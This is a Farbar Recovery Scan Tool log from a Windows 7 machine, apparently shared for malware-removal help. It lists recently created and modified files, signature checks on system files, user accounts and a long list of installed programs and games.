2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-02 08:02 - 000000000 ____D C:\Program Files\K3QPCMS68Z
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\LastGood.Tmp
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-02 12:09 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:15 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2016-11-17 11:34 - 000003490 _____ C:\Windows\System32\Tasks\AutoKMS
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 11:12 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:06 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat
2018-02-16 15:48 - 2013-10-17 21:57 - 008083703 _____ C:\Windows\system32\nvcoproc.bin

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ () C:\Users\Martin\AppData\Local\installer.dat
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-02 10:21 - 2014-02-01 00:01 - 000585520 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb.dll
2014-12-06 21:09 - 2014-02-01 00:01 - 001790768 ____N (Actual Tools) C:\Users\Martin\AppData\Local\Temp\ammemb64.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (18-03-2018 09:05:59)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version:  - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version:  - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version:  - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version:  - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version:  - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version:  - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version:  - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version:  - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version:  - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version:  - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version:  - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version:  - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version:  - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version:  - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version:  - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java™ 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version:  - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version:  - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version:  - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version:  - )
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
